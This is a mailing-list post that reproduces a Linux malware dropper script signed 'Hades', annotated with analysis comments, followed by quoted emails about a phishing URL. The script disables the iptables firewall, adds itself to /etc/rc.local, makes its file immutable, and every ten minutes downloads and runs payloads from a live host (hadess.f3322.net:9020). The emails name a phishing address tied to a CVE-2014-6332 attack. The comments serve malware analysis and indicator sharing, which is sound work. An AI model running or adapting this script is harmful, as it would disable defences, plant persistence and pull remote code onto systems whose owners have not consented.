You got it -
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# by:Hades
# 2016-03-10
#
# NOTE(analysis): Sample preserved verbatim as posted to the list; only the
# "NOTE(analysis)" comments were added. The listing is mail-wrapped: several
# single commands are split across two lines (e.g. the rc.local test, the
# `wc -l` pipelines, the wget calls), so it is not runnable as displayed.
#
# What the visible code does: a persistence + watchdog loop for two files in
# its working directory, `hades` and `journal`. It stops the host firewall,
# registers `journal` in /etc/rc.local, marks it immutable, and every 600 s
# re-downloads and relaunches either file if it is missing or not running.
#
# Indicators visible in this listing (defanged here, live in the code below):
#   - download host  hadess[.]f3322[.]net, TCP port 9020, plain HTTP
#   - /etc/rc.local line of the form  "sh <dir>/journal &"
#   - immutable attribute on <dir>/journal (visible with `lsattr`)
#   - iptables service stopped
#   - processes whose command line contains <dir>/hades or <dir>/journal
#   - a short-lived copy of wget in the working directory

# NOTE(analysis): stops the iptables service in the background and discards
# all output, so the host firewall is disabled without any console message.
service iptables stop > /dev/null 2>&1 &
# NOTE(analysis): every path below is relative to the directory the script was
# started from; that directory is where artifacts should be looked for.
host_dir=`pwd`
# NOTE(analysis): boot persistence. If /etc/rc.local does not already contain
# exactly the line "sh $host_dir/journal &", that line is appended.
# `journal` is started with `sh` here, so it is presumably a shell script -
# possibly this script itself; not confirmable from the listing.
if [ "sh $host_dir/journal &" = "$(cat /etc/rc.local | grep
$host_dir/journal | grep -v grep)" ]; then
echo ""
else
echo "sh $host_dir/journal &" >> /etc/rc.local
fi
# NOTE(analysis): sets the immutable flag on journal, so it cannot be deleted
# or modified (even by root) until the flag is cleared with `chattr -i`.
# Cleanup must clear the flag before removing the file.
chattr +i $host_dir/journal
# NOTE(analysis): watchdog loop, runs forever with a 600-second pause per pass.
while [ 1 ]; do
# NOTE(analysis): number of `ps aux` lines containing "$host_dir/hades".
Centos_sshd_killn=$(ps aux | grep "$host_dir/hades" | grep -v grep | wc
-l)
if [[ $Centos_sshd_killn -eq 0 ]]; then
# NOTE(analysis): nothing matching is running. If the hades file is also
# missing and /usr/bin/wget exists, wget is copied into the working directory,
# used to fetch /hades from the download host over HTTP (-c resume, -O output
# file, output suppressed), and the copy is deleted afterwards. The reason for
# using a local copy of wget is not visible in this listing.
if [ ! -f "$host_dir/hades" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
./wget http://hadess.f3322.net:9020/hades -c -O ./hades &>
/dev/null
chmod 755 ./hades
rm wget -rf
else
echo "No wget"
fi
fi
# NOTE(analysis): launches the payload in the background whether or not a
# download just happened. What `hades` does is not shown on this page.
./hades &
elif [[ $Centos_sshd_killn -gt 1 ]]; then
# NOTE(analysis): more than one match: the counter is decremented per PID and
# the PID at which it reaches 1 is skipped, so all but one process get SIGKILL.
for killed in $(ps aux | grep "$host_dir/hades" | grep -v grep | awk
'{print $2}'); do
Centos_sshd_killn=$(($Centos_sshd_killn-1))
if [[ $Centos_sshd_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
# NOTE(analysis): same watchdog logic repeated for "$host_dir/journal"; the
# differences are the absolute output path and the direct (non-`sh`) launch.
Centos_ssh_killn=$(ps aux | grep "$host_dir/journal" | grep -v grep | wc
-l)
if [[ $Centos_ssh_killn -eq 0 ]]; then
if [ ! -f "$host_dir/journal" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
./wget http://hadess.f3322.net:9020/journal -c -O
$host_dir/journal &> /dev/null
chmod 755 $host_dir/journal
rm wget -rf
else
echo "No wget"
fi
fi
$host_dir/journal &
elif [[ $Centos_ssh_killn -gt 1 ]]; then
# NOTE(analysis): de-duplicates journal processes exactly as done for hades.
for killed in $(ps aux | grep "$host_dir/journal" | grep -v grep |
awk '{print $2}'); do
Centos_ssh_killn=$(($Centos_ssh_killn-1))
if [[ $Centos_ssh_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
# NOTE(analysis): 10-minute interval; a removed file or killed process is
# restored within that window unless the rc.local entry, both files and the
# running loop are dealt with together.
sleep 600
done
-----Original Message-----
From: John Young [mailto:jya@pipeline.com]
Sent: Tuesday, May 10, 2016 7:58 AM
To: cypherpunks@cpunks.org; Greg Moss
Most interested in the Journal file. Could someone have a look?

On May 10, 2016 3:53 AM, "John Young" <jya@pipeline.com> wrote:
At 02:13 AM 5/10/2016, Greg Moss imposter phished:
http://219.234.6.206:8080/
Which produces:
Web attack: Microsoft OleAut32 RCE CVE-2014-6332